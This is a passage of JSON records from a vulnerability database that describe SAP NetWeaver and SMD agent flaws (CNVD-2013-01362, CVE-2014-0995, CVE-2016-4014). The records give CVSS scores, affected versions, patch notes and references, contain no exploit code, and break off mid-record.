"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP SMD agent provides an interface for listening to and processing the P4 protocol. It is a proprietary SAP protocol that allows you to obtain some version and configuration information for configuring installed programs and installing/removing applications",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01362"
},
{
"db": "IVD",
"id": "fd741566-1f33-11e6-abef-000c29c66e3d"
}
],
"trust": 0.72
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-01362",
"trust": 0.8
},
{
"db": "IVD",
"id": "FD741566-1F33-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "fd741566-1f33-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01362"
}
]
},
"id": "VAR-201302-0415",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "fd741566-1f33-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01362"
}
],
"trust": 1.4345896100000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "fd741566-1f33-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01362"
}
]
},
"last_update_date": "2022-05-17T02:02:35.534000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP SMD agent arbitrary program to install patches for execution vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/32385"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01362"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-02/0134.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01362"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "fd741566-1f33-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01362"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-28T00:00:00",
"db": "IVD",
"id": "fd741566-1f33-11e6-abef-000c29c66e3d"
},
{
"date": "2013-02-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01362"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01362"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP SMD agent Arbitrary Program Installation Execution Vulnerability",
"sources": [
{
"db": "IVD",
"id": "fd741566-1f33-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01362"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design error",
"sources": [
{
"db": "IVD",
"id": "fd741566-1f33-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201411-0262
Vulnerability from variot
The Standalone Enqueue Server in SAP Netweaver 7.20, 7.01, and earlier allows remote attackers to cause a denial of service (uncontrolled recursion and crash) via a trace level with a wildcard in the Trace Pattern. SAP NetWeaver are prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. SAP NetWeaver 7.01 and 7.20 are vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0262",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.7,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.01"
}
],
"sources": [
{
"db": "BID",
"id": "70613"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005245"
},
{
"db": "NVD",
"id": "CVE-2014-0995"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1275"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.01",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-0995"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Martin Gallo from Core Security Consulting Services.",
"sources": [
{
"db": "BID",
"id": "70613"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1275"
}
],
"trust": 0.9
},
"cve": "CVE-2014-0995",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2014-0995",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-0995",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201410-1275",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2014-0995",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0995"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005245"
},
{
"db": "NVD",
"id": "CVE-2014-0995"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1275"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Standalone Enqueue Server in SAP Netweaver 7.20, 7.01, and earlier allows remote attackers to cause a denial of service (uncontrolled recursion and crash) via a trace level with a wildcard in the Trace Pattern. SAP NetWeaver are prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to crash the affected application, denying service to legitimate users. \nSAP NetWeaver 7.01 and 7.20 are vulnerable; other versions may also be affected",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-0995"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005245"
},
{
"db": "BID",
"id": "70613"
},
{
"db": "VULMON",
"id": "CVE-2014-0995"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=35000",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0995"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-0995",
"trust": 2.8
},
{
"db": "PACKETSTORM",
"id": "128726",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "60950",
"trust": 1.7
},
{
"db": "BID",
"id": "70613",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005245",
"trust": 0.8
},
{
"db": "XF",
"id": "97610",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1275",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "35000",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2014-0995",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0995"
},
{
"db": "BID",
"id": "70613"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005245"
},
{
"db": "NVD",
"id": "CVE-2014-0995"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1275"
}
]
},
"id": "VAR-201411-0262",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:38:07.556000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2042845",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "Potential denial of service in Enqueue Server #ABAP #Netweaver #SAP Note 2042845 http://ow.ly/CMsqI",
"trust": 0.8,
"url": "https://twitter.com/sap_gsupport/status/522750365780160513"
},
{
"title": "martingalloar",
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar "
},
{
"title": "publications",
"trust": 0.1,
"url": "https://github.com/martingalloar/publications "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0995"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005245"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005245"
},
{
"db": "NVD",
"id": "CVE-2014-0995"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability"
},
{
"trust": 2.5,
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/128726/sap-netweaver-enqueue-server-trace-pattern-denial-of-service.html"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2014/oct/76"
},
{
"trust": 1.7,
"url": "https://twitter.com/sap_gsupport/status/522750365780160513"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/60950"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/97610"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/533719/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0995"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0995"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/533719/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/97610"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/70613"
},
{
"trust": 0.3,
"url": "www.sap.com/platform/netweaver"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/20.html"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/35000/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0995"
},
{
"db": "BID",
"id": "70613"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005245"
},
{
"db": "NVD",
"id": "CVE-2014-0995"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1275"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2014-0995"
},
{
"db": "BID",
"id": "70613"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005245"
},
{
"db": "NVD",
"id": "CVE-2014-0995"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1275"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-06T00:00:00",
"db": "VULMON",
"id": "CVE-2014-0995"
},
{
"date": "2014-10-15T00:00:00",
"db": "BID",
"id": "70613"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005245"
},
{
"date": "2014-11-06T15:55:06.990000",
"db": "NVD",
"id": "CVE-2014-0995"
},
{
"date": "2014-10-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201410-1275"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-13T00:00:00",
"db": "VULMON",
"id": "CVE-2014-0995"
},
{
"date": "2014-10-15T00:00:00",
"db": "BID",
"id": "70613"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005245"
},
{
"date": "2018-12-13T18:27:12.910000",
"db": "NVD",
"id": "CVE-2014-0995"
},
{
"date": "2014-11-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201410-1275"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201410-1275"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Service disruption in a standalone enqueue server (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005245"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201410-1275"
}
],
"trust": 0.6
}
}
var-201604-0121
Vulnerability from variot
XML external entity (XXE) vulnerability in the UDDI component in SAP NetWeaver JAVA AS 7.4 allows remote attackers to cause a denial of service (system hang) via a crafted DTD in an XML request to uddi/api/replication, aka SAP Security Note 2254389. Vendors have confirmed this vulnerability SAP Security Note 2254389 It is released as. Supplementary information : CWE Vulnerability type by CWE-611: Improper Restriction of XML External Entity Reference ('XXE') (XML Inappropriate restrictions on external entity references ) Has been identified. http://cwe.mitre.org/data/definitions/611.htmlSkillfully crafted by a third party XML Service disruption via request (DoS) There is a possibility of being put into a state. Attackers can exploit this issue to obtain potentially sensitive information or cause a denial-of-service condition. This may lead to further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201604-0121",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.4"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002168"
},
{
"db": "NVD",
"id": "CVE-2016-4014"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-307"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.4:*:*:*:java_as:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-4014"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vahagn Vardanyan from ERPScan.",
"sources": [
{
"db": "BID",
"id": "88021"
}
],
"trust": 0.3
},
"cve": "CVE-2016-4014",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-4014",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 4.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.6,
"baseSeverity": "High",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2016-4014",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-4014",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201604-307",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002168"
},
{
"db": "NVD",
"id": "CVE-2016-4014"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-307"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XML external entity (XXE) vulnerability in the UDDI component in SAP NetWeaver JAVA AS 7.4 allows remote attackers to cause a denial of service (system hang) via a crafted DTD in an XML request to uddi/api/replication, aka SAP Security Note 2254389. Vendors have confirmed this vulnerability SAP Security Note 2254389 It is released as. Supplementary information : CWE Vulnerability type by CWE-611: Improper Restriction of XML External Entity Reference (\u0027XXE\u0027) (XML Inappropriate restrictions on external entity references ) Has been identified. http://cwe.mitre.org/data/definitions/611.htmlSkillfully crafted by a third party XML Service disruption via request (DoS) There is a possibility of being put into a state. \nAttackers can exploit this issue to obtain potentially sensitive information or cause a denial-of-service condition. This may lead to further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-4014"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002168"
},
{
"db": "BID",
"id": "88021"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-4014",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "137919",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002168",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201604-307",
"trust": 0.6
},
{
"db": "BID",
"id": "88021",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "88021"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002168"
},
{
"db": "NVD",
"id": "CVE-2016-4014"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-307"
}
]
},
"id": "VAR-201604-0121",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:03:19.338000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Notes April 2016 - DoS vulnerabilities on the rise (2254389)",
"trust": 0.8,
"url": "https://scn.sap.com/community/security/blog/2016/04/14/sap-security-notes-april-2016--dos-vulnerabilities-on-the-rise"
},
{
"title": "SAP NetWeaver AS JAVA UDDI Component XML Fixes for external entity vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60962"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002168"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-307"
}
]
},
"problemtype_data": {
